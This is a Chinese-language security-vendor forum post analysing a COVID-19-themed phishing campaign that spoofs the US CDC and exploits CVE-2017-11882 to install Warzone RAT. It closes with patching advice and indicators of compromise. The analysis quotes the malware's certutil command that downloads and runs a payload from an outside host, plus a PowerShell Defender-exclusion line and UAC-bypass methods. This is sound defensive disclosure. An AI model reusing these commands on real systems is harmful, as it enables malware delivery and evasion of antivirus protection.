本帖最后由 腾讯电脑管家 于 2020-3-25 18:01 编辑
一、背景 腾讯安全威胁情报中心检测到有黑客利用新冠肺炎 (Covid-19) 疫情相关的诱饵文档攻击外贸行业。黑客伪造美国疾病控制和预防中心(CDC)作为发件人,投递附带Office公式编辑器漏洞的文档至目标用户邮箱,收件人在存在Office公式编辑器漏洞(CVE-2017-11882)的电脑上打开文档,就可能触发漏洞下载商业远控木马Warzone RAT。
Warzone RAT是在网络上公开销售的商业木马软件,具有密码采集、远程执行任意程序、键盘记录、远程桌面控制、上传下载文件、远程打开摄像头等多种远程控制功能,并且还可以在包括Win10在内的Windows系统上进行特权提升。
根据腾讯安全威胁情报中心数据,该病毒从3月23日开始传播,目前已有广东、上海、湖北等地的外贸企业受到黑客钓鱼邮件的攻击。腾讯安全专家提醒企业用户小心处理不明邮件,建议网管使用腾讯T-Sec高级威胁检测系统检测黑客攻击,客户端可采用腾讯T-Sec终端安全管理系统或腾讯电脑管家拦截病毒。
二、样本分析攻击邮件伪装成美国疾病控制和预防中心(cdc.gov)发送关于Covid-19的重要更新通知,将漏洞利用的DOC Word文件命名为COVID-19 - nCoV - Special Update.doc,引导收件人打开查看。
此时如果用户在没有安全防护软件,且使用没有修复CVE-2017-11882漏洞的Office打开此文档,就会触发漏洞中的恶意代码,然后恶意代码从C2服务器下载并运行木马病毒。文档下载木马的命令为: CmD /C cErTuTiL -uRlCAchE -sPlIT -f http[:]//getegroup.com/file.exe %TMP%\\1.exe&start %TMP%\\1.exe
File.exe外壳程序采样C#编写,代码经过高度混淆,运行时经过两次解密在内存中Invoke执行最终的PE文件,该PE通过分析可确认为商业远控木马Warzone RAT。
Warzone RAT最早2018年在warzone[.]io上公开出现,目前在warzone[.]pw上提供销售。Warzone RAT商业木马软件具有以下功能: 可通过VNC进行远程桌面控制 可通过RDPWrap进行隐藏的远程桌面控制 特权升级(包括最新的Win10系统) 远程开启摄像头 密码采集(Chrome,Firefox,IE,Edge,Outlook,Thunderbird,Foxmail) 下载并执行任意文件 离线键盘记录器或实时键盘记录器 远程shell 文件管理 进程管理 反向连接
三、窃密木马窃密功能包含窃取各类浏览器登陆使用的账号密码以及邮件客户端保存的账号信息。 获取保存在Chrome中的账号密码信息。
获取保存在IE浏览器中的账号密码信息。
获取OutLook邮箱中的账号密码信息。
获取Thunderbird邮箱中的账号密码信息。
获取Firefo浏览器中的账号密码信息。
四、特权提升如果Warzone RAT以提升的特权运行,则会使用以下PowerShell命令将指定路径添加到Windows Defender的排除项中: powershell Add-MpPreference -ExclusionPath
对于Windows 10以下的版本,使用存储在其资源WM_DSP中的模块进行UAC绕过。
该模块代码最终使用pkgmgr.exe以更高的特权加载恶意程序。
对于Windows 10则利用sdclt.exe 的权限自动提升功能,该功能在Windows备份和还原机制的上下文中使用。
五、远程控制解密出C2地址:phantom101.duckdns.org:5200,与该地址建立连接成为受控机,使电脑完全被黑客控制。
与服务器进行TCP通信,传输数据使用RC4加密算法加密,密钥为”warzone160”。
与控制端通信的部分协议命令和含义如下:
六、安全建议1、建议不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描;
2、 安装CVE-2017-11882漏洞补丁: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
3、 禁用公式编辑器组件: a) 可以通过运行如下命令禁用Office编辑器: reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-000000000046}" /v"Compatibility Flags" /t REG_DWORD /d 0x400 b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令: reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400
4、企业网管,可以设置过滤以下邮件发件人的邮件。 de.iana@aol.com shenzhen@faithfulinc.com
5、 推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客攻击行为进行检测。
6、 企业终端系统保护
IOCsC&C phantom101.duckdns.org:5200 md5 76387fb419cebcfb4b2b42e6dc544e8b 55b75cf1235c3345a62f79d8c824c571 030e95d974c5026499ca159055b2dfa6 URL http[:]//getegroup.com/file.exe
参考链接: https://www.freebuf.com/column/156458.html https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/
| 
发表于 2020-3-25 18:01:24
